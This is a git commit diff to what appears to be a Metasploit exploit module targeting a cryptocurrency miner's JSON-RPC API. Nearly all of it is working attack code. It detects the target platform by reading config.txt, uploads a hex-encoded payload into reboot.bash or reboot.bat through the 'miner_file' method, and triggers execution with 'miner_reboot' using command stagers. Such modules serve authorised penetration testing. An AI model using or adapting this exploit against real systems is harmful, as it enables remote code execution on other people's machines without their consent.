refactor: universal check, payload platform check

GSoC/Meterpreter_Web_Console
phra 2018-06-27 17:11:47 +02:00
parent e9db949418
commit 53f158ef4f
No known key found for this signature in database
GPG Key ID: 91FF93D1B85D76B5
1 changed files with 85 additions and 57 deletions

View File

@ -33,16 +33,19 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => ['win', 'linux'],
'Targets' =>
[
[ 'Automatic Target', { 'auto' => true }],
[ 'Linux',
{
'Platform' => 'linux',
'Arch' => ARCH_X64
'Arch' => ARCH_X64,
'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf' ]
}
],
[ 'Windows',
{
'Platform' => 'windows',
'Arch' => ARCH_X64
'Arch' => ARCH_X64,
'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
}
]
],
@ -60,66 +63,34 @@ class MetasploitModule < Msf::Exploit::Remote
deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
end
def execute_command(cmd, opts = {})
case target['Platform']
when 'linux'
cmd = Rex::Text.to_hex(cmd, '')
when 'windows'
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
end
case target['Platform']
when 'linux'
upload = {
def select_target
data = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_file',
"params" => ['reboot.bash', "#{cmd}"]
}.to_json
when 'windows'
upload = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_file',
"params" => ['reboot.bat', "#{cmd}"]
}.to_json
end
begin
connect
sock.put(upload)
buf = sock.get_once || ''
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
print_error(e)
ensure
disconnect
end
trigger_vulnerability
end
def trigger_vulnerability
execute = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_reboot'
"method" => 'miner_getfile',
"params" => ['config.txt']
}.to_json
connect
sock.put(execute)
sock.put(data)
buf = sock.get_once || ''
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
print_error(e)
ensure
disconnect
end
def exploit
case target['Platform']
when 'linux'
execute_cmdstager
when 'windows'
execute_cmdstager(linemax: 20000)
tmp = StringIO.new
tmp << buf
tmp2 = tmp.string
hex = ''
if tmp2.scan(/\w+/)[5]
return self.targets[1]
elsif tmp2.scan(/\w+/)[7]
return self.targets[2]
else
return nil
end
end
def check
target = select_target
if target.nil?
return Exploit::CheckCode::Safe
end
data = {
"id" => 0,
"jsonrpc" => '2.0',
@ -139,9 +110,6 @@ class MetasploitModule < Msf::Exploit::Remote
when 'windows'
hex = tmp2.scan(/\w+/)[7]
end
if not hex
return Exploit::CheckCode::Safe
end
str = Rex::Text.hex_to_raw(hex)
if str.include?('WARNING')
return Exploit::CheckCode::Vulnerable
@ -149,9 +117,69 @@ class MetasploitModule < Msf::Exploit::Remote
return Exploit::CheckCode::Detected
end
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
vprint_error(e)
vprint_error(e.message)
return Exploit::CheckCode::Unknown
ensure
disconnect
end
def execute_command(cmd, opts = {})
target = select_target
case target['Platform']
when 'linux'
cmd = Rex::Text.to_hex(cmd, '')
upload = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_file',
"params" => ['reboot.bash', "#{cmd}"]
}.to_json
when 'windows'
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
upload = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_file',
"params" => ['reboot.bat', "#{cmd}"]
}.to_json
end
connect
sock.put(upload)
buf = sock.get_once || ''
trigger_vulnerability
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
fail_with(Failure::UnexpectedReply, e.message)
ensure
disconnect
end
def trigger_vulnerability
execute = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_reboot'
}.to_json
connect
sock.put(execute)
buf = sock.get_once || ''
disconnect
end
def exploit
target = select_target
if target.nil?
fail_with(Exploit::Failure::NoTarget, 'No matching target')
end
if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
(target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i)
fail_with Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'"
end
case target['Platform']
when 'linux'
execute_cmdstager(flavor: :echo, linemax: 100000)
when 'windows'
execute_cmdstager(flavor: :vbs, linemax: 100000)
end
end
end